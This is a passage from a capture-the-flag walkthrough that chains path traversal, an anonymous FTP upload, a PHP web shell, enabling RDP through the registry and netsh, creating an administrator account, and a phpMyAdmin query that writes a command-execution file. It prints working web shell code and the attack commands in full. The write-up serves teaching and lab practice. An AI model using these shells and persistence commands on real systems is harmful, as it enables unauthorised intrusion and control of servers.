  • 4. The null byte at the end of the query string was added to terminate the string so that the OS does not read the file as boot.ini.txt (the .txt being appended by the application). Since now we could make the application open and read files we wanted, an obvious attempt was made to read a file that contained an application shell, providing command execution via GET or POST requests. The application did not contain any other pages and did not support the PUT method; hence an alternative method of uploading files had to be searched. Level 3 - FTP File Upload A quick nmap scan with version detection showed a Microsoft FTP server running on port 4242. A more intense version detection scan showed that the FTP server supported anonymous logins. Filezilla was used to connect and upload shell as shown in the screenshots below.
  • 5.
  • 6.
  • 7. The default directory for Microsoft FTP is <drive>inetpubftproot where <drive> is the drive where IIS is installed. An attempt was then made to read the shell.txt file using the path ../../../../inetpub/ftproot/shell The following is the content of the shell.txt file that was uploaded. This is a simple web application backdoor that executes the command passed via the text box. There are more complex shells available on the Internet that can perform other complex functions like file upload and download, file system functions and Windows registry manipulation.
  • 8. <html> <body> <br /> <form method="post"> <input type="text" name="cmd"> <input type="submit" value="Execute!"> <br /> <h2>Command Output</h2> <pre> <?php if(isset($_POST['cmd'])){ $cmd = $_POST['cmd']; if (strlen($cmd)==0){ $cmd = "true"; } system($cmd); die; } ?> </pre> </body> </html> The following screenshot shows the command input field.
  • 9. OS commands can now be executed via this shell. Since the flag file was known to be flag.txt, an attrib command was run on the most common locations where the file could be found. These locations included the C:, the desktop directory of all the users on the system and the web application directory. Since the flag was not found on the file system, it was possible that hints to the flag file could exist in the database. To find the name and credentials for the database, a copy of the index.php file was made as index.txt in the same directory using copy index.php index.txt to be read via the browser. Level 4 - Discovering the DB Server It was found that the database instance was running on a different server altogether whose IP address was 192.168.56.12. A quick nmap scan showed that all requests to 192.168.56.12 were being filtered from my machine.
  • 10. Since the application on 192.168.56.10 was able to communicate with the DB server on 192.168.56.12, it was evident that the application server was the only way to reach the database server.
  • 11. Level 5 - Getting Remote Desktop Access to 192.168.56.10 An nmap scan earlier had already shown that the RDP port 3389 was not open, as is evident below. A quick check was performed using the Windows reg command to verify whether RDP is turned on but is being blocked by the firewall or not. In Windows Operating Systems that run Terminal Services, the DWORD value of fDenyTSConnections at HKLMSystemCurrentControlSetControlTerminal Server determines whether RDP is enabled or not. A value of 1 indicates RDP is turned off and a value of 0 turns the Remote Desktop Service on. A restart/logoff is not required in most cases to change the state of the Remote Desktop Service. The command to query the relevant key is as follows: reg query "HKLMSystemCurrentControlSetControlTerminal Server" Using the reg command, it was possible to remotely enable Remote Desktop on the server via the web shell. The command to add/edit an entry to the Windows registry, in this case the relevant Terminal Server key is as follows: reg add "HKLMSystemCurrentControlSetControlTerminal Server" /v fDenyTSConnections /d 0 /t REG_DWORD /f The above command adds/updates the fDenyTSConnections whose type is a REG_DWORD with data value 0. The /f switch is used to tell the reg command to update the entry without asking for confirmation.
  • 12. After running the command, the Remote Desktop Service is enabled as evidenced by the output of another reg query. As explained before, a value of 0 for the fDenyTSConnections variable enables the Remote Desktop Service. An nmap scan was re-run to confirm whether the RDP service was visible over the network. However, nmap still showed port 3389 in filtered state.
  • 13. Using the command line program, netsh.exe, it is possible to view/add/update Windows firewall rules amongst loads of other functionalities that the program offers. The following command shows the current firewall rules enabled on the server: netsh firewall show config The output clearly shows that the firewall allows connections only on port 80 and any ports opened by the inetinfo.exe executable, which is also responsible for the ftpd service that was running on port 4242.
  • 14. To connect to 192.168.56.10 via RDP, it was necessary to open port 3389 on the firewall using the command line. This can also be achieved using netsh via the following command: netsh firewall set portopening TCP 3389 The netsh firewall show config output now contains the entry to allow connections on port 3389. A quick nmap scan shows the port to be open. We can then connect using mstsc and access the remote server. To login into the server via RDP, a valid user account is required which can be obtained by creating users via the web shell. The newly created user can then be added to the administrators group to be able to login into the server.
  • 15. Level 6 - Creating users on 192.168.56.10 to connect via RDP The following commands can be used to check current users and create a new user and add him to the administrators group: net users net user riyaz pa55w0rd /add net localgroup administrators riyaz /add net user riyaz Once the user, riyaz here, is added to the administrator group, we can connect to the remote server via RDP using the password pa55w0rd.
  • 16. Level 7 - Reaching the DB Server It is already known that the DB server would be reachable from 192.168.56.10. A command line port scanner can be uploaded via mstsc using the Local Resources sharing option. We can use Foundstone’s Scanline command line port scanner with the -bp option to get service banners and to assume the system is up. Once sl.exe is copied to 192.168.56.10, we can execute sl -bp 192.168.56.12, via RDP or the web shell, to find open ports on 192.168.56.12.
  • 17.
  • 18. Scanline detected 2 open ports, 80 (HTTP) and 3306 (MySQL) on 192.168.56.12. The banners show more detailed output regarding the servers. Since port 80 is open, we can see what site is running using Internet Explorer on 192.168.56.12. The DB Server, 192.168.56.12 is running XAMPPLite and phpMyAdmin is publicly accessible (default configuration). A quick check on the contents of all the databases was done to see if there is any information we could use to leverage our attack, however no interesting information existed in the databases that could be used to gain system access. Level 8 - Gaining a Shell on 192.168.56.12 Using phpMyAdmin we can create a file on the server that can be used to execute commands on the server. The phpinfo() command/page available via the XAMPP home page shows the installation directory where we can attempt to create a php file using phpMyAdmin SQL Query Execution tab. The SQL query that can be used to create a php file that could execute OS commands on the DB server is as given below: select '<?php system($_GET["x"])?>' into dumpfile 'C:xampplitephpmyadmincmd.php'
  • 19. This creates a file called cmd.php that allows execution of OS commands in the phpMyAdmin directory. This can be executed by accessing http://192.168.56.12/phpmyadmin/cmd.php?x=<command> from 192.168.56.10. A dir command was run on the most common locations where the file could be found. These locations included the desktop directory of all the users on the system and the C drive. The flag.txt file was found in the root of C Drive using this method.
  • 20. Level 9 - Reading the flag.txt file Using the type command the contents of the C:flag.txt can be read to the screen. The CTF is completed when the string "You know what the Goa'uld really want from us? Minnesota. That's what. For the fishing mostly." is mailed to the creator of the CTF, that’s me  There are several different ways of reaching the flag.txt on the DB server. This walkthrough is just one of the most convenient and enlightening ways of doing it. Riyaz Walikar a.k.a karniv0re riyazwalikar@gmail.com http://www.riyazwalikar.com